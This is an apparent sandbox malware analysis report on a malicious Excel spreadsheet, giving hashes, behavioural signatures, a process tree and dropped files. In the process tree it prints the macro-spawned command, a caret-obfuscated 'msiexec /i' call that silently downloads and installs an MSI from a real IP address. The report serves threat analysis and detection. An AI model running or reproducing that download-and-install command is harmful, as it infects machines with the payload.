Analysis
- max time kernel: 135s
- max time network: 138s
- platform: windows10_x64
- resource: win10
- submitted: 30-06-2020 12:08
Static task: static1
Behavioral task: behavioral1
- Sample: 11203780.xls
- Resource: win7v200430
Behavioral task: behavioral2
- Sample: 11203780.xls
- Resource: win10
General
- Target: 11203780.xls
- Size: 172KB
- MD5: 14b2d3f08ad6543c060d19748f526167
- SHA1: b10646324228a4b21154ef6e7d9d5469a61364e7
- SHA256: 7c3822b0015e740bb3e9a1c4d0d5da368cae8117a820152377d41de49ff3ca36
- SHA512: e800b1d0531a7e5931d6ad9e1cd48003e80d0f366e62f55e6dd17de5613bed9bd431ee40d0baa42e51389d30c1d9509a83e6878faa11f11d8e5745725035766b
Malware Config
Signatures
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
    cmd.exe (pid 2708), target process EXCEL.EXE (pid 3544): Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process
- Blocklisted process makes network request (1 IoC)
  Processes:
    msiexec.exe (pid 3168), flow 10
- Executes dropped EXE (1 IoC)
  Processes:
    MSI9D1.tmp (pid 808)
- Use of msiexec (install) with remote resource (1 IoC)
  Processes:
    msiexec.exe (pid 3264)
- Enumerates connected drives (3 TTPs, 48 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes:
    msiexec.exe (two instances): File opened (read-only) \??\A:, \??\B:, \??\E:, \??\F:, \??\G:, \??\H:, \??\I:, \??\J:, \??\K:, \??\L:, \??\M:, \??\N:, \??\O:, \??\P:, \??\Q:, \??\R:, \??\S:, \??\T:, \??\U:, \??\V:, \??\W:, \??\X:, \??\Y:, \??\Z: (every drive letter except C: and D:, each opened twice: 24 letters, 48 events)
- Drops file in Windows directory (6 IoCs)
  Processes:
    msiexec.exe: File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
    msiexec.exe: File opened for modification C:\Windows\Installer\
    msiexec.exe: File created C:\Windows\Installer\inprogressinstallinfo.ipi
    msiexec.exe: File opened for modification C:\Windows\Installer\MSI943.tmp
    msiexec.exe: File opened for modification C:\Windows\Installer\MSI9D1.tmp
    msiexec.exe: File opened for modification C:\Windows\Installer\MSI4FC.tmp
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
    EXCEL.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
    EXCEL.EXE: Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
    EXCEL.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes:
    EXCEL.EXE: Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS
    EXCEL.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
    EXCEL.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes:
    EXCEL.EXE (pid 3544)
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes:
    msiexec.exe (pid 3168), two events
- Suspicious use of AdjustPrivilegeToken (44 IoCs)
  Processes:
    msiexec.exe (pid 3264), tokens in order of appearance: SeShutdownPrivilege, SeIncreaseQuotaPrivilege, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege (31 events)
    msiexec.exe (pid 3168): SeSecurityPrivilege once, then SeRestorePrivilege and SeTakeOwnershipPrivilege alternating, six times each (13 events)
- Suspicious use of SetWindowsHookEx (12 IoCs)
  Processes:
    EXCEL.EXE (pid 3544), 12 events
- Suspicious use of WriteProcessMemory (7 IoCs)
  Processes:
    PID 3544 EXCEL.EXE wrote to memory of 2708 cmd.exe (2 events)
    PID 2708 cmd.exe wrote to memory of 3264 msiexec.exe (2 events)
    PID 3168 msiexec.exe wrote to memory of 808 MSI9D1.tmp (3 events)
Processes
- C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (tree level 1)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\11203780.xls"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
- C:\Windows\System32\cmd.exe (tree level 2, child of EXCEL.EXE)
  Command line: "C:\Windows\System32\cmd.exe" /c ms^iE^x^ec /i http://199.195.250.60/gg/11203780.msi /qn
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
- C:\Windows\system32\msiexec.exe (tree level 3, child of cmd.exe)
  Command line: msiExec /i http://199.195.250.60/gg/11203780.msi /qn
  - Use of msiexec (install) with remote resource
  - Enumerates connected drives
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\msiexec.exe (tree level 1)
  Command line: C:\Windows\system32\msiexec.exe /V
  - Blocklisted process makes network request
  - Enumerates connected drives
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- C:\Windows\Installer\MSI9D1.tmp (tree level 2, child of msiexec.exe /V)
  Command line: "C:\Windows\Installer\MSI9D1.tmp"
  - Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Windows\Installer\MSI9D1.tmp
  MD5: 42013c93a1711781565cb1373a43f971
  SHA1: 15a6ee651a4d11d55c2c130295c0f53741a2be62
  SHA256: dcbaf7178636323a226f048b4c8f64510b5b36fbfebcdf56df543eba07bc3bd1
  SHA512: 3b16826760380fd0cf10cd85d5cf9ded4c504e5bc9c8932e09ce88c02cc2dadf80d7198f14ff8f1dfdd52ab78a26ca7eca0c664f47ef8e790ae04cff0baf4bd9
- memory/808-7-0x0000000000000000-mapping.dmp
- memory/2708-3-0x0000000000000000-mapping.dmp
- memory/3264-4-0x0000000000000000-mapping.dmp
- memory/3264-5-0x000002A80C2E0000-0x000002A80C2E4000-memory.dmp
  Filesize: 16KB